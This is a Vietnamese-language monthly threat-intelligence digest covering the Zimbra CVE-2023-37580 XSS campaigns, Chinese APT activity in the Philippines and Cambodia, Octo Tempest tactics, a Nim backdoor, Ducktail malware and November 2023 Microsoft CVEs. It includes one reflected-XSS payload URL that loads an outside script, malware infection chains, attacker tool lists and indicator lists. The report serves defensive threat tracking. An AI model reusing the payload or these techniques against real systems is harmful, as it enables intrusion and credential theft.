Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài viết
1 Các mối đe dọa nâng cao – Advanced Threats
1.1 Nhóm tấn công sử dụng lỗ hổng 0-day tấn công vào các tổ chức
Nhóm phân tích mối đe dọa (TAG) của Google đã phát hiện các cuộc tấn công khai thác lỗ hổng 0-day nhắm vào máy chủ email Zimbra Collaboration, máy chủ email được nhiều tổ chức sử dụng để lưu trữ emai. TAG đã quan sát thấy bốn chiến dịch tấn công khai thác cùng một lỗi để đánh cắp dữ liệu email, thông tin xác thực của người dùng và authentication tokens. Các hoạt động này được ghi nhận xảy ra sau khi bản vá ban đầu được được công khai trên Github.
Lỗ hổng được sử dụng trong các cuộc tấn công là CVE-2023-37580 – reflected cross-site scripting (XSS) vulnerability, cho phép kẻ tấn công chèn các lệnh độc hại vào website.
https://mail.REDACTED[.]com/m/momoveto?st=acg”/><script src=”https://REDACTED/script.js”></script>//
Các chiến dịch được TAG ghi nhận như sau:
Chiến dịch 1: Khai thác được ghi nhận lần đầu nhằm đánh cắp email
Phát hiện ban đầu về lỗ hổng 0-day là một chiến dịch nhắm vào một tổ chức chính phủ ở Hy Lạp. Kẻ tấn công đã gửi email chứa các url khai thác tới nạn nhân, nếu nạn nhân click vào liên kết url sẽ tải xuống một famework sử dụng XSS để đánh cắp dữ liệu của người dùng như email và tệp đính kèm đồng cấu hình tự động chuyển tiếp đến địa chỉ email do kẻ tấn công kiểm soát.
https://obsorth[.]opwtjnpoc[.]ml/pQyMSCXWyBWJpIos.js
Chiến dịch 2: Winter Vivern (UNC4907)
TAG xác định được số lượng khai thác nhắm mục tiêu vào các tổ chức chính phủ ở Moldova và Tunisia, mỗi url chứa một địa chỉ email chính thức cho các tổ chức thuộc chính phủ. TAG cho rằng các hoạt động khai thác tấn công này thuộc về nhóm APT Winter Vivern (UNC4907).
https://applicationdevsoc[.]com/zimbraMalwareDefender/zimbraDefender.js
https://applicationdevsoc[.]com/tndgt/auth.js
Chiến dịch 3: Khai thác lỗ hổng nhằm lừa đảo chiếm đoạt thông tin xác thực
Nhóm tấn công đã khai thác lỗ hổng trong chiến dịch lừa đảo nhằm lấy thông tin đăng nhập của một tổ chức chính phủ ở Việt Nam. URL được trỏ đến một trang web lừa đảo được thiết kế như một trang đăng nhập. Thông tin đánh cắp được sẽ được lưu trữ trên một trang web chính thức của chính phủ (được cho là đã bị chiếm quyền điều khiển)
Chiến dịch 4: Khai thác lỗ hổng nhằm đánh cắp authentication token
Nhóm tấn công sử dụng lỗ hổng nhắm mục tiêu vào một tổ chức chính phủ ở Pakistan, được sử dụng để đánh cắp Zimbra authentication token. Token bị đánh cắp sẽ được chuyển tới ntcpk[.]org.
Indicators of compromise (IoCs)
https://obsorth.opwtjnpoc[.]ml/pQyMSCXWyBWJpIos.js
https://applicationdevsoc[.]com/zimbraMalwareDefender/zimbraDefender.js
https://applicationdevsoc[.]com/tndgt/auth.js
ntcpk[.]org
1.2 Các hoạt động tấn công vào các quốc gia thuộc khu vực Đông Nam Á từ Trung Quốc
Palo Alto ghi nhận các nhóm tấn công từ Trung Quốc có các hành vi tấn công khai thác vào các nước thuộc khu vực Đông Nam Á, cụ thể là Philippines và Campuchia.
Stately Taurus – các chiến dịch tấn công nhắm tới Philippines
Nhóm tấn công có tên Stately Taurus (hay còn gọi là Mustang Panda, Bronze President, Red Delta, Luminous Moth, Earth Preta và Camaro Dragon) nhằm mục tiêu vào các thực thể ở Nam Thái Bình Dương, bao gồm cả chính phủ Philippines. Trong chiến dịch, nhóm tấn công tận dụng phần mềm hợp pháp bao gồm Solid PDF Creator và SmadavProtect (giải pháp chống virus có trụ sở tại Indonesia) để tải các tệp tin độc hại. Ngoài ra nhóm cũng cấu hình các phần mềm độc hại để mạo danh các truy cập hợp pháp của Microsoft cho các kết nối lệnh và kiểm soát (C2).
Chiến dịch 1:
Nhóm tấn công sử dụng tệp tin được lưu trữ trên Google Drive có tên 230728 meeting minutes.zip, bên trong file nén có file thực thi cùng tên (file hợp pháp của phần mềm Solid PDF Creator đã được đổi tên) và một tệp tin DLL ẩn SolidPDFCreator.dll. DLL nãy sẽ được gọi khi thực thi file .exe. DLL thực hiện tạo kết nối tới máy chủ C2 tại địa chỉ 45.121.146[.]113
Chiến dịch 2:
Gần giống như chiến dịch 1, file zip có tên NUG’s Foreign Policy Strategy.zip, bên trong có 2 tệp tin exe cùng tên và DLL SolidPDFCreator.dll
Ngoài ra, tệp tin cũng có một đường dẫn ẩn chứa 3 tệp tin errordetails, SmadavProtect32.exe và Smadhook32c.dll
Khi DLL SolidPDFCreator.dll được thực thi, nó sao chép 3 tệp tin errordetails, SmadavProtect32.exe và Smadhook32c.dll và cấu hình registry key tại đường dẫn HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AHealthDB\SmadavProtect32.exe
SmadavProtect32.exe là file hợp pháp của phần mềm antivirus của Indonesia SmadAV. Khi thực thi, nó sẽ gọi tới SmadHook32c.dll nhằm tạo kết nối tới máy chủ C2 45.121.146[.]113.
Chiến dịch 3:
Tương tự như cấu trúc file ở chiến dịch đầu tiên, tệp tin nén có tên Labor Statement.zip, bên trong tệp tin nén bao gồm một file exe cùng tên và một tệp tin DLL ẩn. DLL thực hiện tạo kết nối tới máy chủ C2 tại địa chỉ 45.121.146[.]113 như 2 chiến dịch trước.
Địa chỉ IP 45.121.146[.]113 được liên kết tới nhóm Stately Taurus trong một loạt chiến dịch vào tháng 06 2023. Kẻ tấn công tiếp tục tận dụng cơ sở hạ tầng này trong thời gian gần đây, một điểm đáng chú ý là nhóm tấn công giả mạo lưu lượng truy cập hợp pháp của Microsoft thông qua POST request tới địa chỉ wcpstatic.microsoft[.]com. Một số kết nối tới máy chủ C2 được bắt nguồn từ cơ sở hạ tầng của chính phủ Philippines.
Indicators of Compromise
Stately Taurus Samples
bebde82e636e27aa91e2e60c6768f30beb590871ea3a3e8fb6aedbd9f5c154c5
24c6449a9e234b07772db8fdb944457a23eecbd6fbb95bc0b1398399de798584
ba7c456f229adc4bd75bfb876814b4deaf6768ffe95a03021aead03e55e92c7c
969b4b9c889fbec39fae365ff4d7e5b1064dad94030a691e5b9c8479fc63289c
3597563aebb80b4bf183947e658768d279a77f24b661b05267c51d02cb32f1c9
d57304415240d7c08b2fbada718a5c0597c3ef67c765e1daf4516ee4b4bdc768
54be4a5e76bdca2012db45b1c5a8d1a9345839b91cc2984ca80ae2377ca48f51
2b05a04cd97d7547c8c1ac0c39810d00b18ba3375b8feac78a82a2f9a314a596
C2:
45.121.146[.]113
URL:
hxxps://drive.google[.]com/uc?id=1QLIQXP-s42TtZsONsKLAAtOr4Pdxljcu
Chiến dịch tấn công khác nhắm tới Campuchia
Nhóm tấn công APT khác của Trung Quốc giả mạo dịch vụ sao lưu trên cloud (cloud backup services) nhắm mục tiêu tới Campuchia. Việc ghi nhận này trên việc phát hiện có ít nhất 24 tổ chức chính phủ thuộc các nhóm ngành như quốc phòng, bầu cử, quyền con người, tài chính quốc gia, viễn thông, v.v… thuộc Campuchia có các kết nối mạng tới cơ sở hạ tầng của nhóm tấn công trong nhiều tháng
Cơ sở hạ tầng dưới đây liên quan đến chứng chỉ SSL độc hại, được sử dụng bởi 6 máy chủ trên 6 địa chỉ IP khác nhau, mỗi máy chủ sử dụng thêm một số subdomain liên kết tới 6 domain. Các domain này mạo danh là dịch vụ lưu trữ đám mây. Thông tin chứng chỉ SSL như sau:
Subject Full Name | C=US,ST=Some-State,O=Internet Widgits Pty Ltd,CN=10.200.206.100 |
Issuer Full Name | C=US,ST=Some-State,O=Internet Widgits Pty Ltd,CN=COM |
Serial Number | 15007560845348164646 |
SHA1 Hash | B8CFF709950CFA86665363D9553532DB9922265C |
Valid From | 2017-11-23 |
Valid To | 2027-11-21 |
IP Address | Target Port | Domain(s) |
165.232.186[.]197 | 80, 443, 4433
|
api.infinitycloud[.]info
connect.infinitycloud[.]info ns.infinitycloud[.]info |
167.71.226[.]171 | 80, 81, 82, 443, 769, 4433, 8086, 8089 | file.wonderbackup[.]com
connect.infinitybackup[.]net share.infinitybackup[.]net sync.wonderbackup[.]com |
104.248.153[.]204 | 82, 443
|
update.wonderbackup[.]com
login.wonderbackup[.]com ns1.infinitybackup[.]net |
143.110.189[.]141
|
443 | mfi.teleryanhart[.]com
ads.teleryanhart[.]com |
172.105.34[.]34
|
8081, 8087, 8443, 8888
|
jlp.ammopak[.]site
kwe.ammopak[.]site lxo.ammopak[.]site dfg.ammopak[.]site fwg.ammopak[.]site |
194.195.114[.]199
|
8080, 8443, 9200
|
connect.clinkvl[.]com |
Indicators of Compromise
Domains
api.infinitycloud[.]info
connect.infinitycloud[.]info
ns.infinitycloud[.]info
connect.infinitybackup[.]net
ns1.infinitybackup[.]net
share.infinitybackup[.]net
file.wonderbackup[.]com
login.wonderbackup[.]com
sync.wonderbackup[.]com
update.wonderbackup[.]com
ads.teleryanhart[.]com
mfi.teleryanhart[.]com
dfg.ammopak[.]site
fwg.ammopak[.]site
jlp.ammopak[.]site
kwe.ammopak[.]site
lxo.ammopak[.]site
connect.clinkvl[.]com
IP Addresses
165.232.186[.]197
167.71.226[.]171
104.248.153[.]204
143.110.189[.]141
172.105.34[.]34
194.195.114[.]199
SSL Certificate SHA-1 Fingerprint
B8CFF709950CFA86665363D9553532DB9922265C
1.3 Octo Tempest – nhóm tấn công hoạt động với động cơ tài chính vào nhiều nhóm ngành nghề
Microsoft theo dõi các hoạt động và các chiến dịch liên quan đến nhóm tấn công Octo Tempest. Nhóm tấn công nổi tiếng trong việc có các chiến dịch lừa đảo sử dụng kỹ thuật adversary-in-the-middle (AiTM) phishing, lừa đảo hoán đổi sim (SIM swapping) để chiếm quyền điều khiển các tổ chức trên toàn cầu nhằm mục đích tống tiền, lần đầu được phát hiện vào đầu năm 2022 nhắm mục tiêu vào các tổ chức kinh doanh và viễn thông di động cung cấp các dịch vụ hoán đổi sim. Octo Tempest kiếm tiền từ các hoạt động xâm nhập vào năm 2022 bằng cách bán dịch vụ hoán đổi SIM cho tội phạm khác hoặc thực hiện chiếm đoạt tài khoản để đánh cắp tiền điện tử của nạn nhân
Sang đầu năm 2023, Octo Tempest mở rộng phạm vi tấn công sang các tổ chức thuộc lĩnh vực cáp viễn thông, email và công nghệ. Trong giai đoạn này, Octo Tempest bắt đầu kiếm tiền từ các hành vi xâm nhập bằng cách tống tiền các tổ chức sử dụng các dữ liệu đã đánh cắp được trước đó. Giữa năm 2023, nhóm tấn công khai thác lỗ hổng trên các máy chủ Vmware ESXi và triển khai mã độc tống tiền – ransomware ALPHV/BlackCat, phạm vi tấn công cũng mở rộng sang các lĩnh vực gaming, khách sạn, sản phẩm tiêu dùng, dịch vụ tài chính, v.v… Gần đây, Microsoft ghi nhận Octo Tempest sử dụng nhiều kỹ thuật – chiến thuật nâng cao (TTP) trong các cuộc tấn công:
Initial access
Octo Tempest sử dụng các cuộc tấn công kỹ nghệ xã hội (social engineering) nhắm vào các quản trị viên, nhóm tấn công thực hiện nghiên cứu về tổ chức và xác định đầy đủ thông tin về nạn nhân để thực hiện mạo danh lừa quản trị viên thực hiện đặt lại mật khẩu và đặt lại các phương thức xác thực đa yếu tố (MFA).
Octo Tempest có được quyền truy cập ban đầu vào tổ chức bằng một trong số các phương pháp sau:
- Kỹ nghệ xã hội
- Lừa người dùng cài các tiện ích cho truy cập từ xa
- Điều hướng đến một trang web giảo mạo được thiết kế như trang đăng nhập
- Xóa các thông báo FIDO2 của nạn nhân
- Giả mạo người dùng trong tổ chức, yêu cầu quản trị viên hỗ trợ đặt lại mật khẩu hoặc thêm/thay đổi các yếu tố xác thực
- Mua thông tin xác thực của người dùng trên thị trường underground
- SMS phishing lừa người dùng truy cập tới đường dẫn được thiết kế là trang web giả mạo đăng nhập
- Lừa đảo hoán đổi sim
Reconnaissance and discovery
Octo Tempest sử dụng các thông tin xác thực đã có được thực hiện tìm kiếm thông tin liên quan đến kiến trúc mạng, giới thiệu nhân viên, phương pháp truy cập từ xa, chính sách mật khẩu và kho thông tin xác thực. Tìm kiếm thông tin quyền truy cập và tài nguyên trên môi trường đám mây, kho lưu trữ mã, cơ sở hạ tầng quản lý máy chủ và sao lưu, v.v.
Công cụ sử dụng:
- PingCastle và ADRecon thực hiện thu thập thông tin về Active Directory
- Advanced IP Scanner thu thập thông tin mạng của tổ chức
- Govmomi Go library nhằm liệt kê các API vCenter
- PureStorage FlashArray PowerShell
Privilege escalation and credential access
Sử dụng quyền truy cập hiện có thực hiện trao đổi SIM hoặc thiết lập chuyển tiếp. Octo Tempest sẽ cấu hình lại mật khẩu cho tài khoản của người dùng sau khi giành được quyền kiểm soát số điện thoại.
Sử dụng kỹ nghệ xã hội – gọi tới bộ phận hỗ trợ hoặc quản trị viên để đặt lại mật khẩu hoặc thay đổi/thêm các mã thông báo/yếu tố xác thực đa yếu tố.
Masquerading and collection for escalation
- Sửa đổi chính sách truy cập hoặc sử dụng MicroBurst để có quyền truy cập vào kho lưu trữ thông tin xác thực
- Sử dụng các công cụ mã nguồn mở: Mimikatz, Hekatomb, Lazagne, gosecretsdump, smbpasswd.py, LinPEAS, ADFSDump
- Sử dụng tiện ích mở rộng VMAccess để đặt lại mật khẩu hoặc sửa đổi cấu hình của Azure
- Tạo snapshots virtual domain controller để tải xuống và giải nén NTDS.dit
- Gán role hoặc quyền truy cập
Defense evasion
Octo Tempest chiếm các tài khoản bảo mật nhằm tắt các sản phẩm và tính năng bảo mật. Ngoài ra, nhóm cũng thực hiện sửa đổi các rule của mailbox.
- Sử dụng công cụ mã nguồn mở như Privacy.sexy Framework để vô hiệu hóa các sản phẩm bảo mật
- Cấu hình lại thông tin về vị trí đáng tin cậy trong Conditional Access Policies để mở rộng khả năng truy cập
Persistence
Để duy trì quyền truy cập, Octo Tempest cài đặt nhiều công cụ RMM hợp pháp và thực hiện các sửa đổi cấu hình mạng nhằm cho phép truy cập. Sử dụng reverse shell trên cả hai môi trường Windows và Linux tạo kết nối reverse shell tới cùng cơ sở hạ tầng C2 của kẻ tấn công như công cụ RMM đã triển khai. Ngoài ra, Octo Tempest cũng chiếm quyền điều khiển của VMware ESXi, cài đặt Bedevil backdoor Linux mã nguồn mở, sau đó khởi chạy các tập lệnh VMware Python để chạy các câu lệnh tùy ý.
- Sử dụng công cụ mã nguồn mở: ScreenConnect, FleetDeck, AnyDesk, RustDesk, Splashtop, Pulseway, TightVNC, LummaC2, Level.io, Mesh, StrategicRMM, Tailscale, Ngrok, WsTunnel, Rsocx và Socat.
- Triển khai các máy ảo Azure để cho phép truy cập từ xa thông qua cài đặt RMM hoặc sửa đổi các tài nguyên hiện có thông qua Azure serial console.
- Bổ sung các phương pháp MFA cho người dùng
- Việc sử dụng công cụ tunneling Twingate
Data theft, extortion, and ransomware
Động cơ chính của nhóm là tài chính, các hành vi khác nhau như đánh cắp tiền điện từ, đánh cắp dữ liệu để tống tiền và triển khai ransomware lại tùy thuộc vào từng ngành nghề lĩnh vực.
- Sử dụng các dịch vụ của bên thứ ba như FiveTran để trích xuất các bản sao của cơ sở dữ liệu dịch vụ có giá trị cao, chẳng hạn như SalesForce và ZenDesk thông qua API
- Lọc các tệp PST của hòm thư và chuyển tiếp thư đến các hòm thư bên ngoài
2 Malware
2.1 Backdoor được viết bằng ngôn ngữ Nim được sử dụng trong các chiến dịch tình báo vào các nước thuộc khu vực Nam Á
Gần đây, trong quá trình theo dõi trung tâm tình báo mối đe dọa QiAnXin đã phát hiện các mẫu độc hại nhắm mục tiêu vào Bhutan. Thông qua lừa người dùng mở tài liệu độc hại nhằm thực thi backdoor được viết bằng Nim. Dựa trên đặc điểm trong backdoor, nhóm phân tích liên kết đến các mẫu mã độc tấn công vào Nepal và Myanmar
MD5 | File name | Type |
7bea8ea83d5b4fe5985172dbb4fa1468 | GlobalLeadershipProgram1.docm | Macro document |
04e9ce276b3cd75fc2b20b9b33080f7e | Seniority_List.docm | Encrypted macro document [5]
(Password: 20221114PROM ) |
92612dc223e8f0656512cd882d66f78b | svchost.exe | Nim backdoor |
c2184d8fd3dd3df9fd6cf7ff8e32a3a4 | sihosts.exe | Nim backdoor |
b2ab01d392d7d20a9261870e709b18d7 | conhost.exe | Nim backdoor |
30ddd9ebe00f34f131efcd8124462fe3 | sihosts.exe | Nim backdoor |
Tài liệu chứa marco sẽ được kích hoạt khi nạn nhân click vào Enable Editing, marco chỉ có nhiệm vụ drop các file để thực thi về sau.
Hàm Sch_task() sẽ thực thi drop file VBS có tên OCu3HBg7gyI9aUaB.vbs tại đường dẫn “%AppData%\Microsoft\Windows\Start Menu\Programs\Startup”.
Hàm Hide_cons() thực hiện drop file tại đường dẫn “%LocalAppData%\skriven.vbs”.
Hàm Read_shell() trích xuất dữ liệu zip từ văn bản của object UserForm1.TextBox1 từ document và lưu dưới dạng “%LocalAppData%\Microsoft\svchost.zip”.
Hàm Vb_chain() drop file tại đường dẫn “%LocalAppData%\8lGghf8kIPIuu3cM.bat”. Cuối cùng, gọi hàm ActiveDocument.Shapes hai lần để loại layer “enabled macro” và hiển thị nội dung file decoy
OCu3HBg7gyI9aUaB.vbs được cấu hình trong đường dẫn Startup, khi khởi chạy nó thực hiện khởi chạy 8lGghf8kIPIuu3cM.bat
skriven.vbs chạy file được chỉ định với các tham số, file bat được thực thi ở chế độ ẩn
8lGghf8kIPIuu3cM.bat thực hiện trích xuất thêm một số các file, các file này sẽ được gọi lần lượt. Thông tin đường dẫn và nhiệm vụ của các file như sau:
- %LocalAppData%\unzFile.vbs: Tạo file unz.vbs
- %LocalAppData%\2L7uuZQboJBhTERK.bat: Gọi tới lần lượt 2 file tại đường dẫn %LocalAppData%\unzFile.vbs và %LocalAppData%\2BYretPBD4iSQKYS.bat
- %LocalAppData%\2BYretPBD4iSQKYS.bat: Gọi tới unz.vbs giải nén file svchost.zip và tạo gọi tới file %LocalAppData%\d.bat
- %LocalAppData%\d.bat: Lập lịch cho file có tên svchost.exe (được giải nén từ svchost.zip) và gọi tới %LocalAppData%\e.bat
- %LocalAppData%\e.bat: Xóa bỏ tất cả các script được drop từ 8lGghf8kIPIuu3cM.bat
Nim backdoor
File svchost.zip có chứa file svchost.exe được lập lịch thực thi bởi script d.bat như mô tả ở trên. File có chứa một số chuỗi đặc biệt:
MD5 | String |
92612dc223e8f0656512cd882d66f78b | E:\\Store\\MACRO\\BT\\bt_apache.nim
|
c2184d8fd3dd3df9fd6cf7ff8e32a3a4 | E:\\Store\\MACRO\\NP\\np_apache.nim |
b2ab01d392d7d20a9261870e709b18d7 | E:\\Store\\macro\\mm\\mm_apache.nim |
30ddd9ebe00f34f131efcd8124462fe3 | C:\\Users\\ProCoder\\Desktop\\Store\\MACRO\\MM\\mm_apache.nim |
Backdoor thực hiện kiểm tra môi trường đang được thực thi, bao gồm:
- Kiểm tra xem các tiến trình hiện tại có các tiến trình nào liên quan đến phân tích, debug hay được sử dụng trong quá trình phân tích mã độc
- Kiểm tra thời gian thực thi, trong mẫu 30ddd9ebe00f34f131efcd8124462fe3, mã độc cũng thực hiện kiểm tra số lượng CPU và cách thức di chuyển của chuột
Sau khi thực hiện kiểm tra môi trường, mã độc thực hiện sao chép một số địa chỉ URL của máy chủ C2
Thực thi câu lệnh “cmd /c hostname” để thu thập thông tin máy chủ, sau đó sử dụng hàm có tên gốc là bakery__bt95apache để mã hóa và gửi GET request tới máy chủ
Sau khi nhận được dữ liệu phản hồi thì C2, mã độc sẽ thực hiện giải mã và ghép với chuỗi cmd /c để thực thi các câu lệnh. Kết quả sẽ được gửi lại máy chủ C2 thông qua GET request. Dữ liệu lớn có thể được phân mảnh thành các group 100 bytes trước khi gửi đi
Ngoài URL, máy chủ C2 cũng được chọn ngẫu nhiên, dữ liệu được sử dụng với một số trường sau:
(Field) | description |
id = | Hostname mã hóa theo base64 |
/session= | Số thứ tự của dữ liệu đã được mã hóa, tính từ 0 |
?/value= | Dữ liệu đã mã hóa theo base64 |
/return=true | none |
Indicators of Compromise
MD5
7bea8ea83d5b4fe5985172dbb4fa1468
04e9ce276b3cd75fc2b20b9b33080f7e
92612dc223e8f0656512cd882d66f78b
c2184d8fd3dd3df9fd6cf7ff8e32a3a4
b2ab01d392d7d20a9261870e709b18d7
30ddd9ebe00f34f131efcd8124462fe3
C&C
dns-mofgovbt.ddns.net
mail-mofgovbt.hopto.org
microsoftupdte.redirectme.net
updatemanager.ddns.net
mx2.nepal.gavnp.org
cloud.nitc.gavnp.org
dns.nepal.gavnp.org
mx1.nepal.gavnp.org
asean-ajp.myftp.org
dof-govmm.sytes.net
mail-mohs.servehttp.com
drsasa.hopto.org
pdf-shanstate.serveftp.com
myanmar-apn.serveftp.com
mytel-mm.servehttp.com
pdf-shanstate.redirectme.net
URL
hxxp://dns-mofgovbt.ddns.net/update/
hxxp://mail-mofgovbt.hopto.org/update/
hxxp://microsoftupdte.redirectme.net/update/
hxxp://updatemanager.ddns.net/update/
hxxp://mx2.nepal.gavnp.org/mail/AFA/
hxxp://cloud.nitc.gavnp.org/mail/AFA/
hxxp://dns.nepal.gavnp.org/mail/AFA/
hxxp://mx1.nepal.gavnp.org/mail/AFA/
hxxp://asean-ajp.myftp.org/MOFA/
hxxp://dof-govmm.sytes.net/MOFA/
hxxp://mail-mohs.servehttp.com/MOFA/
hxxp://drsasa.hopto.org/MOFA/
hxxp://pdf-shanstate.serveftp.com/MOFA/
2.2 Ducktail – phần mềm độc hại được sử dụng bởi các nhóm tội phạm mạng tại Việt Nam
Ducktail là họ phần mềm độc hại đã hoạt động từ nửa cuối năm 2021 và nhằm mục đích đánh cắp tài khoản doanh nghiệp trên Facebook, các báo cáo đều quy cho các cuộc tấn công này đến từ Việt Nam. Các mẫu mã độc được upload trên VirusTotal gần đây đều nhắm mục tiêu vào các chuyên gia marketing, với đặc điểm mới sử dụng Delphi làm ngôn ngữ lập trình
Nhóm tấn công sử dụng các hình ảnh cùng file giả mạo PDF với phần mở rộng là .exe. Được gửi qua email dưới tên của một công ty quần áo lớn
Nếu người dùng thực hiện mở tệp tin PDF giả mạo, tệp tin đọc lại sẽ lưu file Powershell có tên param.ps1 và giải mã file PDF có tên INDITEX2.pdf vào đường dẫn C:\Users\Public và mở file để lừa người dùng
Mã độc cũng tạo lưu DLL độc hại có libEGL.dll to C:\Users\Public\Libraries\ và thực thi. Khi thực thi, nó sẽ tìm kiếm các file LNK tại các đường dẫn
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\,
- C:\ProgramData\Microsoft\Internet Explorer\Khởi chạy nhanh\Người dùng đã ghim\TaskBar\
Một số chuỗi trong binary được mã hóa bằng thuật toán AES mode CBC với khóa “gnghfn47n467n43b” và vector khởi tạo IV “ dakfhskljh92384h”
Ngoài việc khởi chạy DLL, mã độc cũng thực hiện lưu extension độc hại trong Chrome tại đường C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\fjoaledfpmneenckfbpdfhkmimnjocfa. Extension này giả mạo Google Docs Offline
Extension này gọi tới các script bị obfuscate gây khó khăn trong quá trình phân tích
Script có nhiệm vụ chính gửi thông tin đến các tab của trình duyệt đến máy chủ C2, nếu phát hiện các URL liên quan đến facebook, nó sẽ kiểm tra và cố gắng đánh cắp các tài khoản liên quan đến quảng cáo và business account. Ngoài ra, extension cũng đánh cắp cookie và thông tin chi tiết về tài khoản mà nạn nhân đăng nhập trên thiết bị. Để bỏ qua xác thực 2 yếu tố (2FA), đoạn script sử dụng các API của Facebook và dịch vụ 2fa[.]live của Việt Nam, cho phép cung cấp các công cụ hỗ trợ khác nhau để tạo one-time access code. Thông tin đánh cắp sẽ được gửi tới máy chủ C2 được đăng ký tại Việt Nam
Indicators of Compromise
Hash
c82b959d43789d3dbf5115629c3c01fa8dd599fbec36df0f4bc5d0371296545a
2b3decf08bf9223fb3e3057b5a477d35e62c0b5795a883ceaa9555ca7c28252f
69257876e2ec5bdbe7114d6ce209f13afbfddb2af0006a6d17e6e91578966870
da13db80b0f3c25b512a1692494f303eff1ff1778a837208f79e2f3c81f8192e
bde696a0ae901864716320e3111d5aa49cba3b1d9375dce2903f7433a287b2f2
04dd228d0b088c4116b503c31de22c1746054226a533286bec3a3d0606d73119
89f016d32707f096cc8daf674e5a9fc2ba6cf731d610f5303d997fc848645788
7da7ca7fcbc6e8bc22b420f82ae5756ecd3ad094b8ebcbd5a78a2362eb87b226
655a8ea3bc1baff01639dcdc43a294f8a5dc622e543d8f51e9d51c6eaaae6f6e
1117a93b4b4b78e4d5d6bd79f5f0e04926759558218df30e868464f05bf1bd3d
554353cda0989c3a141c2ab0d0db06393e4f3fd201727e8cf2ed8d136f87d144
b9a984383a5825868c23bc3afdc70e3af2a56d26d002431940d2429c8e88ace9
c6ae36e28668c6132da4d08bca7ceb13adf576fa1dbdb0a708d9b3b0f140dd03
d03e1a0fce0b112bba4d56380c8d1be671845dd3ed90ec847635ba6015bad84d
ab95f377bf7ae66d26ae7d0d56b71dec096b026b8090f4c5a19ac677a9ffe047
f59e2672f43f327c9c84c057ad3840300a2cd1db1c536834f9e2531c74e5fd1c
ba8eb1a7f18e4cfca7dd178de1546d42ffb50028c8f3f7ba6551f88c11be75db
06afd110d91419ece0114a7fdeaeba4e79fbc9f2a0450da8b4f264e4ae073a26
64f6cbe9adf91bc4ed457c79643d764a130b0d25364817c8b6da17b03ff91aa7
bdf8dea28f91adcba7780a26951abc9c32a4a8c205f3207fd4f349f6db290da7
d4f10bd162ee77f4778ecc156921f5949cd2d64aab45b31d6050f446e59aed5a
bdf8dea28f91adcba7780a26951abc9c32a4a8c205f3207fd4f349f6db290da7
C&C
dauhetdau[.]com
motdanvoi20232023[.]com
voiconprivatesv2083[.]com
cavoisatthu2023asd[.]com
3 CVE và các khuyến nghị bảo mật
3.1 Microsoft Patch Tuesday – November 2023
Trong tháng 11, Microsoft đã phát hành các bản vá cho 63 CVE mới trong các sản phẩm của Microsoft Windows và Windows Components; Exchange Server; Office và Office Components; ASP.NET và .NET Framework; Azure; Mariner; Microsoft Edge (Chromium-based), Visual Studio, và Windows Hyper-V. Trong đó có 3 lỗ hổng được đánh giá mức độ Nghiêm trọng, 56 lỗ hổng được đánh giá là Important. Dưới đây là các CVE nổi bật:
3.1.1 CVE-2023-2023-36033 – Lỗ hổng leo thang đặc quyền trong Windows Desktop Manager | Windows DWM Core Library Elevation of Privilege Vulnerability
CVSS: 7.8/10
Mô tả: Tồn tại lỗ hổng trong Windows Desktop Manager (DWM) cho phép kẻ tấn công leo thang đặc quyền lên quyền SYSTEM. Lỗ hổng được Microsoft ghi nhận đang được các nhóm tấn công lợi dụng khai thác.
Phiên bản ảnh hưởng:
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36033
3.1.2 CVE-2023-36036 – Lỗ hổng leo thang đặc quyền | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability.
CVSS: 7.8/10
Mô tả: Windows Cloud Files Filter Driver được sử dụng để quản lý và hỗ trợ các hoạt động liên quan đến các tệp tin được lưu trữ trên cloud. Khai thác thành công lỗ hổng cho phép kẻ tấn công chiếm được quyền SYSTEM. Lỗ hổng được Microsoft ghi nhận đang được các nhóm tấn công lợi dụng khai thác.
Phiên bản ảnh hưởng:
Windows 11 Version 23H2 for x64-based Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for ARM64-based Systems
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
